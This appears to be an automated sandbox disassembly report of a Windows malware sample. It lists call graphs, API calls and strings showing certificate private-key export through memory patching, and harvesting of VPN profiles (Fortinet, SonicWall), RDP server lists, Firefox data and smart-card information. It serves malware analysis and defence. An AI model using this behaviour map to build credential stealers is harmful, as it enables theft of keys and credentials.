calls 4578->4579 4582 7ff763af7629 4579->4582 4580 7ff763af755b 4581 7ff763af785c 5 API calls 4580->4581 4584 7ff763af7596 4581->4584 4583 7ff763af785c 5 API calls 4582->4583 4586 7ff763af7664 4583->4586 4585 7ff763af785c 5 API calls 4584->4585 4585->4578 4587 7ff763af785c 5 API calls 4586->4587 4588 7ff763af769f 4587->4588 4589 7ff763af785c 5 API calls 4588->4589 4590 7ff763af76da 4589->4590 4591 7ff763af785c 5 API calls 4590->4591 4592 7ff763af7715 4591->4592 4593 7ff763af785c 5 API calls 4592->4593 4594 7ff763af7750 4593->4594 4595 7ff763af785c 5 API calls 4594->4595 4596 7ff763af778b 4595->4596 4597 7ff763af785c 5 API calls 4596->4597 4598 7ff763af77c6 4597->4598 4599 7ff763af785c 5 API calls 4598->4599 4600 7ff763af7801 4599->4600 4601 7ff763af785c 5 API calls 4600->4601 4601->4574 4603 7ff763af7918 4602->4603 4603->4603 4604 7ff763af7977 LoadLibraryA GetProcAddress 4603->4604 4605 7ff763af7991 GetCurrentProcess IsWow64Process 4604->4605 4606 7ff763af74a9 4604->4606 4605->4606 4607 7ff763af79ad 4605->4607 4606->4564 4607->4606 4609 7ff763af74de 4608->4609 4609->4570 4610->4573 4612 7ff763af1990 4 API calls 4611->4612 4613 7ff763af7888 4612->4613 4614 7ff763af1990 4 API calls 4613->4614 4615 7ff763af7893 4614->4615 4616 7ff763af1990 4 API calls 4615->4616 4617 7ff763af78a2 4616->4617 4625 7ff763af7034 4617->4625 4620 7ff763af1990 4 API calls 4621 7ff763af78d5 4620->4621 4621->4580 4623 7ff763af7116 CoUninitialize 4622->4623 4626 7ff763af7079 4625->4626 4627 7ff763af707d 4626->4627 4629 7ff763af6004 4626->4629 4627->4620 4630 7ff763af601a 4629->4630 4633 7ff763af7234 4630->4633 4642 7ff763af7310 4633->4642 4635 7ff763af6042 4636 7ff763af7260 4640 7ff763af1990 4 API calls 4636->4640 4638 7ff763af1990 4 API calls 4639 7ff763af7275 4638->4639 4641 7ff763af19e4 4 API calls 4639->4641 4640->4635 4641->4636 4643 7ff763af733e 4642->4643 4644 7ff763af7381 4643->4644 4645 7ff763af7362 4643->4645 4646 7ff763af73bb 4644->4646 4648 7ff763af7395 4644->4648 4650 7ff763af1a70 5 API calls 4645->4650 4647 7ff763af1990 4 API calls 4646->4647 4649 7ff763af73ca 4647->4649 4654 7ff763af1a70 5 API calls 4648->4654 4651 7ff763af1990 4 API calls 4649->4651 4652 7ff763af7251 4650->4652 4653 7ff763af73d5 4651->4653 4652->4635 4652->4636 4652->4638 4655 7ff763af1990 4 API calls 4653->4655 4654->4652 4655->4652 5065 7ff763af61f8 5066 7ff763af620e 5065->5066 5067 7ff763af7234 5 API calls 5066->5067 5068 7ff763af623c 5067->5068 5069 7ff763af7234 5 API calls 5068->5069 5070 7ff763af625c 5069->5070 5086 7ff763af6270 5087 7ff763af6293 5086->5087 5087->5087 5088 7ff763af7234 5 API calls 5087->5088 5089 7ff763af6302 5088->5089 5090 7ff763af7234 5 API calls 5089->5090 5091 7ff763af6321 5090->5091 5092 7ff763af7234 5 API calls 5091->5092 5093 7ff763af6340 5092->5093 5094 7ff763af7234 5 API calls 5093->5094 5095 7ff763af635f 5094->5095 5096 7ff763af7234 5 API calls 5095->5096 5097 7ff763af637e 5096->5097 5098 7ff763af6d30 5099 7ff763af6d51 5098->5099 5099->5099 5100 7ff763af7234 5 API calls 5099->5100 5101 7ff763af6dc0 5100->5101 5102 7ff763af7234 5 API calls 5101->5102 5103 7ff763af6e2d 5102->5103 5104 7ff763af72d4 5 API calls 5103->5104 5105 7ff763af6e4c 5104->5105 5114 7ff763af71ec 5105->5114 5107 7ff763af6e6b 5108 7ff763af71ec 5 API calls 5107->5108 5109 7ff763af6edd 5108->5109 5110 7ff763af7234 5 API calls 5109->5110 5111 7ff763af6f42 5110->5111 5112 7ff763af7234 5 API calls 5111->5112 5113 7ff763af6fa0 5112->5113 5115 7ff763af7310 5 API calls 5114->5115 5116 7ff763af7209 5115->5116 5117 7ff763af722e 5116->5117 5118 7ff763af1990 4 API calls 5116->5118 5117->5107 5118->5117 4656 7ff763af2bac 4657 7ff763af2bc5 4656->4657 4658 7ff763af1990 4 API calls 4657->4658 4659 7ff763af2bdc 4658->4659 4660 7ff763af19e4 4 API calls 4659->4660 4661 7ff763af2bec 4660->4661 4662 7ff763af1990 4 API calls 4661->4662 4663 7ff763af2c00 CertOpenStore 4662->4663 4664 7ff763af2c24 4663->4664 4665 7ff763af2c48 4663->4665 4666 7ff763af1990 4 API calls 4664->4666 4669 7ff763af1990 4 API calls 4665->4669 4667 7ff763af2c38 4666->4667 4671 7ff763af2d5c CertEnumCertificatesInStore 4667->4671 4670 7ff763af2cbd CertCloseStore 4669->4670 4672 7ff763af319c 4671->4672 4678 7ff763af2daa 4671->4678 4673 7ff763af31ad 4672->4673 4675 7ff763af25b4 2 API calls 4672->4675 4673->4665 4674 7ff763af2db0 CertGetNameStringW 4674->4678 4675->4673 4676 7ff763af1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4676->4678 4677 7ff763af19e4 4 API calls 4677->4678 4678->4674 4678->4676 4678->4677 4679 7ff763af1990 4 API calls 4678->4679 4680 7ff763af2e8e CertNameToStrW 4679->4680 4682 7ff763af2eca 4680->4682 4681 7ff763af1990 4 API calls 4681->4682 4682->4681 4683 7ff763af19e4 4 API calls 4682->4683 4684 7ff763af1990 4 API calls 4682->4684 4683->4682 4685 7ff763af2eec CertNameToStrW 4684->4685 4687 7ff763af2f1c 4685->4687 4686 7ff763af1990 4 API calls 4686->4687 4687->4686 4688 7ff763af19e4 4 API calls 4687->4688 4689 7ff763af1990 4 API calls 4687->4689 4688->4687 4690 7ff763af2f3e FileTimeToSystemTime 4689->4690 4691 7ff763af2f84 4690->4691 4692 7ff763af1a70 5 API calls 4691->4692 4693 7ff763af2faf FileTimeToSystemTime 4692->4693 4697 7ff763af2ffa 4693->4697 4694 7ff763af1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4694->4697 4695 7ff763af79f0 2 API calls 4695->4697 4696 7ff763af25b4 2 API calls 4696->4697 4697->4694 4697->4695 4697->4696 4698 7ff763af1990 4 API calls 4697->4698 4702 7ff763af308d 4697->4702 4700 7ff763af316e CertEnumCertificatesInStore 4698->4700 4700->4672 4700->4674 4702->4697 4703 7ff763af25b4 2 API calls 4702->4703 4704 7ff763af1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4702->4704 4705 7ff763af25b4 2 API calls 4702->4705 4706 7ff763af3220 CertGetCertificateContextProperty 4702->4706 4733 7ff763afa78c 4702->4733 4703->4702 4704->4702 4705->4697 4707 7ff763af348c 4706->4707 4708 7ff763af326c CryptAcquireCertificatePrivateKey 4706->4708 4707->4702 4708->4707 4709 7ff763af329b 4708->4709 4710 7ff763af32b4 CryptGetUserKey 4709->4710 4711 7ff763af34a9 OpenSCManagerA 4709->4711 4710->4707 4713 7ff763af32c9 4710->4713 4712 7ff763af34dd 4711->4712 4716 7ff763af34fb 6 API calls 4712->4716 4737 7ff763af36f0 4713->4737 4715 7ff763af32e5 4715->4707 4719 7ff763af3333 LoadLibraryA 4715->4719 4717 7ff763af35d1 4716->4717 4747 7ff763af25dc GetProcessHeap HeapAlloc 4717->4747 4721 7ff763af335f 4719->4721 4722 7ff763af337a GetProcAddress VirtualProtect 4721->4722 4724 7ff763af33c1 4722->4724 4723 7ff763af361d 4725 7ff763af3652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4723->4725 4728 7ff763af33d0 VirtualProtect CryptExportKey 4724->4728 4748 7ff763af25dc GetProcessHeap HeapAlloc 4725->4748 4728->4707 4729 7ff763af340e VirtualProtect 4728->4729 4745 7ff763af262c 4729->4745 4732 7ff763af3463 CryptImportKey 4732->4707 4732->4723 4734 7ff763afa7b4 4733->4734 4750 7ff763af25dc GetProcessHeap HeapAlloc 4734->4750 4738 7ff763af3728 CryptExportKey 4737->4738 4743 7ff763af370f 4737->4743 4739 7ff763af374e 4738->4739 4740 7ff763af37ac 4738->4740 4741 7ff763af37a8 4739->4741 4744 7ff763af3766 CryptExportKey 4739->4744 4749 7ff763af25dc GetProcessHeap HeapAlloc 4740->4749 4741->4715 4743->4738 4744->4740 4744->4741 4746 7ff763af2634 VirtualProtect CryptAcquireContextA 4745->4746 4746->4707 4746->4732 5119 7ff763af5fac 5120 7ff763af5fc2 5119->5120 5121 7ff763af7234 5 API calls 5120->5121 5122 7ff763af5ff0 5121->5122 5123 7ff763af69ec 5124 7ff763af6a0f 5123->5124 5125 7ff763af7234 5 API calls 5124->5125 5126 7ff763af6a7e 5125->5126 5126->5126 5127 7ff763af7234 5 API calls 5126->5127 5128 7ff763af6aed 5127->5128 5129 7ff763af72d4 5 API calls 5128->5129 5130 7ff763af6b0c 5129->5130 5131 7ff763afe4e8 lstrcpyW PathAppendW 5132 7ff763afe534 5131->5132 5133 7ff763afcd0c 6 API calls 5132->5133 5135 7ff763afe54f 5133->5135 5134 7ff763afe602 5135->5134 5136 7ff763af1990 4 API calls 5135->5136 5137 7ff763afe56e 5136->5137 5138 7ff763af19e4 4 API calls 5137->5138 5139 7ff763afe579 5138->5139 5140 7ff763af1990 4 API calls 5139->5140 5141 7ff763afe590 5140->5141 5142 7ff763af19e4 4 API calls 5141->5142 5143 7ff763afe59f 5142->5143 5143->5143 5144 7ff763af1990 4 API calls 5143->5144 5145 7ff763afe5f6 5144->5145 5146 7ff763af25b4 2 API calls 5145->5146 5146->5134 4898 7ff763af1968 4901 7ff763af25dc GetProcessHeap HeapAlloc 4898->4901 4201 7ff763afdc20 4202 7ff763afdc74 4201->4202 4203 7ff763af1990 4 API calls 4202->4203 4204 7ff763afdcaa 4203->4204 4205 7ff763af1990 4 API calls 4204->4205 4206 7ff763afdcc1 4205->4206 4330 7ff763afcc08 RegOpenKeyExW 4206->4330 4208 7ff763afdce1 4209 7ff763af1990 4 API calls 4208->4209 4210 7ff763afdd44 4209->4210 4211 7ff763af1990 4 API calls 4210->4211 4212 7ff763afdd5b 4211->4212 4336 7ff763afcd0c RegGetValueW 4212->4336 4215 7ff763afdd88 4218 7ff763afdd94 PathCombineW PathFileExistsW 4215->4218 4216 7ff763afdec7 4217 7ff763af1990 4 API calls 4216->4217 4219 7ff763afded6 4217->4219 4220 7ff763afdeb4 4218->4220 4221 7ff763afddba PathQuoteSpacesW 4218->4221 4225 7ff763af1990 4 API calls 4219->4225 4222 7ff763af25b4 2 API calls 4220->4222 4344 7ff763afd004 4221->4344 4222->4216 4224 7ff763afddd0 lstrcatW 4346 7ff763afe8b8 4224->4346 4227 7ff763afdeed 4225->4227 4229 7ff763afcc08 4 API calls 4227->4229 4231 7ff763afdf06 4229->4231 4232 7ff763af1990 4 API calls 4231->4232 4234 7ff763afdf22 4232->4234 4235 7ff763af1990 4 API calls 4234->4235 4237 7ff763afdf31 4235->4237 4240 7ff763af1990 4 API calls 4237->4240 4242 7ff763afdf48 4240->4242 4246 7ff763afdf54 GetEnvironmentVariableW 4242->4246 4250 7ff763afdf7d 4246->4250 4251 7ff763afe1fb 4246->4251 4255 7ff763afdf89 PathAppendW PathFileExistsW 4250->4255 4252 7ff763af1990 4 API calls 4251->4252 4253 7ff763afe20a 4252->4253 4259 7ff763af1990 4 API calls 4253->4259 4255->4251 4256 7ff763afdfae CreateFileW 4255->4256 4256->4251 4257 7ff763afdfe3 GetFileSize 4256->4257 4458 7ff763af25dc GetProcessHeap HeapAlloc 4257->4458 4261 7ff763afe221 4259->4261 4264 7ff763afcc08 4 API calls 4261->4264 4266 7ff763afe23e 4264->4266 4269 7ff763af1990 4 API calls 4266->4269 4271 7ff763afe25a 4269->4271 4273 7ff763af1990 4 API calls 4271->4273 4275 7ff763afe271 4273->4275 4279 7ff763afe27d GetEnvironmentVariableW 4275->4279 4280 7ff763afe390 4279->4280 4281 7ff763afe2a0 4279->4281 4283 7ff763af1990 4 API calls 4280->4283 4285 7ff763afe2ac PathAppendW PathFileExistsW 4281->4285 4286 7ff763afe39f 4283->4286 4285->4280 4289 7ff763afe2d1 CreateFileW 4285->4289 4290 7ff763af1990 4 API calls 4286->4290 4289->4280 4294 7ff763afe306 GetFileSize 4289->4294 4295 7ff763afe3ae 4290->4295 4459 7ff763af2588 GetProcessHeap HeapAlloc 4294->4459 4331 7ff763afcceb 4330->4331 4332 7ff763afcc5b RegEnumKeyExW 4330->4332 4331->4208 4333 7ff763afcc91 RegEnumKeyExW 4332->4333 4334 7ff763afcce0 RegCloseKey 4332->4334 4333->4334 4334->4331 4337 7ff763afcd55 4336->4337 4338 7ff763afcda1 4336->4338 4460 7ff763af2588 GetProcessHeap HeapAlloc 4337->4460 4338->4215 4338->4216 4345 7ff763afd05f 4344->4345 4345->4224 4461 7ff763afe7e0 4346->4461 4472 7ff763af25dc GetProcessHeap HeapAlloc 4461->4472 5160 7ff763afec1c 5161 7ff763afec33 5160->5161 5163 7ff763afec47 5160->5163 5166 7ff763af25dc GetProcessHeap HeapAlloc 5161->5166 4751 7ff763af2b1c 4752 7ff763af1990 4 API calls 4751->4752 4753 7ff763af2b42 4752->4753 4754 7ff763af19e4 4 API calls 4753->4754 4755 7ff763af2b4d 4754->4755 4756 7ff763af1990 4 API calls 4755->4756 4757 7ff763af2b5c 4756->4757 4758 7ff763af1990 4 API calls 4757->4758 4759 7ff763af2b6b CertEnumSystemStore 4758->4759 4760 7ff763af1990 4 API calls 4759->4760 4761 7ff763af2b94 4760->4761 5182 7ff763af639c 5183 7ff763af63c7 5182->5183 5184 7ff763af7234 5 API calls 5183->5184 5185 7ff763af6449 5184->5185 5186 7ff763af7234 5 API calls 5185->5186 5187 7ff763af6468 5186->5187 5188 7ff763af7234 5 API calls 5187->5188 5189 7ff763af6487 5188->5189 5190 7ff763af7234 5 API calls 5189->5190 5191 7ff763af64ed 5190->5191 5192 7ff763af7234 5 API calls 5191->5192 5193 7ff763af650c 5192->5193 5194 7ff763af7234 5 API calls 5193->5194 5195 7ff763af652b 5194->5195 5220 7ff763af7298 5195->5220 5197 7ff763af654a 5198 7ff763af7234 5 API calls 5197->5198 5199 7ff763af6569 5198->5199 5200 7ff763af7234 5 API calls 5199->5200 5201 7ff763af6588 5200->5201 5202 7ff763af7234 5 API calls 5201->5202 5203 7ff763af65f7 5202->5203 5204 7ff763af7234 5 API calls 5203->5204 5205 7ff763af6616 5204->5205 5206 7ff763af72d4 5 API calls 5205->5206 5207 7ff763af6635 5206->5207 5208 7ff763af72d4 5 API calls 5207->5208 5209 7ff763af6654 5208->5209 5210 7ff763af72d4 5 API calls 5209->5210 5211 7ff763af66b7 5210->5211 5212 7ff763af7234 5 API calls 5211->5212 5213 7ff763af66d6 5212->5213 5214 7ff763af7234 5 API calls 5213->5214 5215 7ff763af66f5 5214->5215 5216 7ff763af7234 5 API calls 5215->5216 5217 7ff763af6714 5216->5217 5218 7ff763af7234 5 API calls 5217->5218 5219 7ff763af6733 5218->5219 5221 7ff763af7310 5 API calls 5220->5221 5222 7ff763af72b5 5221->5222 5223 7ff763af72ce 5222->5223 5224 7ff763af1a70 5 API calls 5222->5224 5223->5197 5224->5223 5241 7ff763af6758 5242 7ff763af677b 5241->5242 5243 7ff763af7234 5 API calls 5242->5243 5244 7ff763af67ea 5243->5244 5245 7ff763af7234 5 API calls 5244->5245 5246 7ff763af6859 5245->5246 5247 7ff763af7234 5 API calls 5246->5247 5248 7ff763af6878 5247->5248 5249 7ff763af7234 5 API calls 5248->5249 5250 7ff763af6897 5249->5250 5251 7ff763af7234 5 API calls 5250->5251 5252 7ff763af68b6 5251->5252

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 7ff763afdc20-7ff763afdc88 call 7ff763af26b0 3 7ff763afdc8c-7ff763afdc9d 0->3 3->3 4 7ff763afdc9f-7ff763afdd23 call 7ff763af1990 call 7ff763afd98c call 7ff763af1990 call 7ff763afcc08 call 7ff763af1abc call 7ff763af26b0 3->4 17 7ff763afdd26-7ff763afdd37 4->17 17->17 18 7ff763afdd39-7ff763afdd82 call 7ff763af1990 call 7ff763afd7c8 call 7ff763af1990 call 7ff763afd6d0 call 7ff763afcd0c 17->18 29 7ff763afdd88-7ff763afddb4 call 7ff763afd884 PathCombineW PathFileExistsW 18->29 30 7ff763afdec7-7ff763afdf77 call 7ff763af1990 call 7ff763afd630 call 7ff763af1990 call 7ff763afcc08 call 7ff763af1abc call 7ff763af1990 * 2 call 7ff763afd444 call 7ff763af1990 call 7ff763afd090 GetEnvironmentVariableW 18->30 35 7ff763afdebb-7ff763afdec2 call 7ff763af25b4 29->35 36 7ff763afddba-7ff763afde28 PathQuoteSpacesW call 7ff763afd004 lstrcatW call 7ff763afe8b8 call 7ff763af9644 call 7ff763af26b0 29->36 82 7ff763afdf7d-7ff763afdfa8 call 7ff763afda34 PathAppendW PathFileExistsW 30->82 83 7ff763afe1fb-7ff763afe29a call 7ff763af1990 call 7ff763afd59c call 7ff763af1990 call 7ff763afcc08 call 7ff763af1abc call 7ff763af1990 call 7ff763afd510 call 7ff763af1990 call 7ff763afd2c4 GetEnvironmentVariableW 30->83 35->30 55 7ff763afde2b-7ff763afde3d 36->55 55->55 57 7ff763afde3f-7ff763afde51 call 7ff763af900c 55->57 63 7ff763afde95-7ff763afdeb4 call 7ff763af9624 call 7ff763af1abc call 7ff763af25b4 57->63 64 7ff763afde53-7ff763afde66 call 7ff763af95a0 57->64 63->35 73 7ff763afde8b-7ff763afde90 call 7ff763af9478 64->73 74 7ff763afde68-7ff763afde7a call 7ff763af97dc 64->74 73->63 74->73 86 7ff763afde7c-7ff763afde86 call 7ff763af1990 74->86 82->83 92 7ff763afdfae-7ff763afdfdd CreateFileW 82->92 130 7ff763afe390-7ff763afe3bf call 7ff763af1990 * 2 83->130 131 7ff763afe2a0-7ff763afe2cb call 7ff763afd340 PathAppendW PathFileExistsW 83->131 86->73 92->83 93 7ff763afdfe3-7ff763afe018 GetFileSize call 7ff763af25dc ReadFile 92->93 99 7ff763afe1f3-7ff763afe1f6 call 7ff763af25b4 93->99 100 7ff763afe01e-7ff763afe05a call 7ff763afcdf8 call 7ff763af1990 call 7ff763afcf34 93->100 99->83 116 7ff763afe0bc-7ff763afe0ee call 7ff763af1990 call 7ff763afcf68 call 7ff763afcf34 100->116 117 7ff763afe05c-7ff763afe085 call 7ff763afcf68 call 7ff763afcf34 100->117 141 7ff763afe150-7ff763afe182 call 7ff763af1990 call 7ff763afcf68 call 7ff763afcf34 116->141 142 7ff763afe0f0-7ff763afe119 call 7ff763afcf68 call 7ff763afcf34 116->142 117->116 133 7ff763afe087-7ff763afe0b7 call 7ff763afce48 call 7ff763af79f0 call 7ff763af19e4 call 7ff763af25b4 117->133 131->130 144 7ff763afe2d1-7ff763afe300 CreateFileW 131->144 133->116 168 7ff763afe1e4-7ff763afe1ee call 7ff763af1990 141->168 169 7ff763afe184-7ff763afe1ad call 7ff763afcf68 call 7ff763afcf34 141->169 142->141 162 7ff763afe11b-7ff763afe14b call 7ff763afce48 call 7ff763af79f0 call 7ff763af19e4 call 7ff763af25b4 142->162 144->130 150 7ff763afe306-7ff763afe33f GetFileSize call 7ff763af2588 ReadFile 144->150 150->130 164 7ff763afe341-7ff763afe38b call 7ff763afdb8c call 7ff763af1990 call 7ff763af79f0 call 7ff763af19e4 call 7ff763af1990 call 7ff763af25b4 150->164 162->141 164->130 168->99 169->168 186 7ff763afe1af-7ff763afe1df call 7ff763afce48 call 7ff763af79f0 call 7ff763af19e4 call 7ff763af25b4 169->186 186->168
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                                              • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                                              • API String ID: 2508640211-1951492331
                                                                                                                              • Opcode ID: 3dab4bb89e52ac56b1afccd30bff1bf4046f419fe15edfd2c7799a845a73dea7
                                                                                                                              • Instruction ID: 31f06540f14cd6945dd8d2cdb2d01952d2da6e8335f55ed3e67fe0199275f307
                                                                                                                              • Opcode Fuzzy Hash: 3dab4bb89e52ac56b1afccd30bff1bf4046f419fe15edfd2c7799a845a73dea7
                                                                                                                              • Instruction Fuzzy Hash: 2812D551A18642C5EA90FB22D450AFDE351AF857C4FC8413AF94E6B79AEF3CD509D320

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                                              • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                                              • API String ID: 4154822446-3438982840
                                                                                                                              • Opcode ID: ab9af763abc7d4980dca85413c9ca4f9eaa0fae7f7f21b43bcf5c8f526f7cc92
                                                                                                                              • Instruction ID: 774eee45654627bb7f3f57f77c2214f23db791a5a9bcb1bdb9147cba98ca7dad
                                                                                                                              • Opcode Fuzzy Hash: ab9af763abc7d4980dca85413c9ca4f9eaa0fae7f7f21b43bcf5c8f526f7cc92
                                                                                                                              • Instruction Fuzzy Hash: 2C318521B18947D1EB54EF10E8409E8A361FB48798FC44136E99D5B7A8EF7CD609C750

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                                              • String ID: http
                                                                                                                              • API String ID: 948891078-2541227442
                                                                                                                              • Opcode ID: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
                                                                                                                              • Instruction ID: a2fbea1789b893571f669253452cc060a097445c0395455ae41b034c5346ff15
                                                                                                                              • Opcode Fuzzy Hash: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
                                                                                                                              • Instruction Fuzzy Hash: 28417132609A46D5E750AF71D484BEDA3A0EB44B8CF88413AEA4D5BB68DF3CD145D310

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 395 7ff763afb43c-7ff763afb48b call 7ff763afab3c call 7ff763af1990 * 2 call 7ff763afe925 403 7ff763afb490-7ff763afb494 395->403 404 7ff763afb89d-7ff763afb8d2 call 7ff763afb28c call 7ff763af1990 call 7ff763afae34 call 7ff763af1990 call 7ff763af1a70 403->404 405 7ff763afb49a-7ff763afb4bd call 7ff763afe92b 403->405 435 7ff763afb8d7-7ff763afb8f7 call 7ff763af1990 404->435 411 7ff763afb4c3-7ff763afb4da call 7ff763afacbc call 7ff763af1990 405->411 412 7ff763afb74a-7ff763afb77b call 7ff763afaa00 call 7ff763af1990 call 7ff763afb214 call 7ff763af1990 call 7ff763af1a70 405->412 427 7ff763afb72f-7ff763afb733 411->427 445 7ff763afb780-7ff763afb7c7 call 7ff763afaf64 call 7ff763af1990 SCardListCardsW 412->445 430 7ff763afb4df-7ff763afb4e2 427->430 431 7ff763afb739-7ff763afb748 call 7ff763af1990 427->431 433 7ff763afb4e4-7ff763afb4ee call 7ff763af1990 430->433 434 7ff763afb4f3-7ff763afb560 call 7ff763af1990 call 7ff763afabc8 call 7ff763af1990 call 7ff763af19e4 call 7ff763af1990 call 7ff763af2554 SCardGetStatusChangeW 430->434 431->445 433->434 474 7ff763afb566-7ff763afb595 call 7ff763afb11c call 7ff763af1a70 call 7ff763afa988 call 7ff763af1990 434->474 475 7ff763afb6d9-7ff763afb6ed call 7ff763afb364 call 7ff763af1990 call 7ff763afb0a4 434->475 455 7ff763afb856-7ff763afb887 call 7ff763afaff0 call 7ff763af1990 call 7ff763afaac4 call 7ff763af1990 call 7ff763af1a70 445->455 456 7ff763afb7cd-7ff763afb7e4 call 7ff763afad40 call 7ff763af1990 445->456 489 7ff763afb88c-7ff763afb89b call 7ff763af1990 455->489 469 7ff763afb832-7ff763afb836 456->469 472 7ff763afb7e6-7ff763afb7e8 469->472 473 7ff763afb838-7ff763afb854 call 7ff763af1990 SCardFreeMemory 469->473 478 7ff763afb7ea-7ff763afb7f4 call 7ff763af1990 472->478 479 7ff763afb7f9-7ff763afb82e call 7ff763af1990 call 7ff763af19e4 call 7ff763af1990 call 7ff763af7eb8 472->479 473->489 511 7ff763afb5ba-7ff763afb5cd call 7ff763af1990 474->511 512 7ff763afb597 474->512 502 7ff763afb6f2-7ff763afb70a call 7ff763af1990 call 7ff763af1a70 475->502 478->479 479->469 489->435 517 7ff763afb70f-7ff763afb72b call 7ff763af1990 call 7ff763af7eb8 502->517 522 7ff763afb6b4-7ff763afb6d7 call 7ff763afadb8 call 7ff763af1990 * 2 511->522 523 7ff763afb5d3-7ff763afb608 SCardListCardsW 511->523 515 7ff763afb59b-7ff763afb5b8 call 7ff763af1a70 512->515 515->511 517->427 522->517 526 7ff763afb60e-7ff763afb625 call 7ff763afac40 call 7ff763af1990 523->526 527 7ff763afb699-7ff763afb6b2 call 7ff763afaeac call 7ff763af1990 call 7ff763afb19c 523->527 544 7ff763afb675-7ff763afb679 526->544 527->502 546 7ff763afb67b-7ff763afb697 call 7ff763af1990 SCardFreeMemory 544->546 547 7ff763afb627-7ff763afb62a 544->547 546->517 549 7ff763afb62c-7ff763afb636 call 7ff763af1990 547->549 550 7ff763afb63b-7ff763afb671 call 7ff763af1990 call 7ff763af19e4 call 7ff763af1990 call 7ff763af7eb8 547->550 549->550 550->544
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                                              • String ID: "_": ""$%02X
                                                                                                                              • API String ID: 2879528921-1880646522
                                                                                                                              • Opcode ID: 8ec0c6864f41985d24004ca6e018bc4ddce3b9f89499130afec725e7e5dd47f0
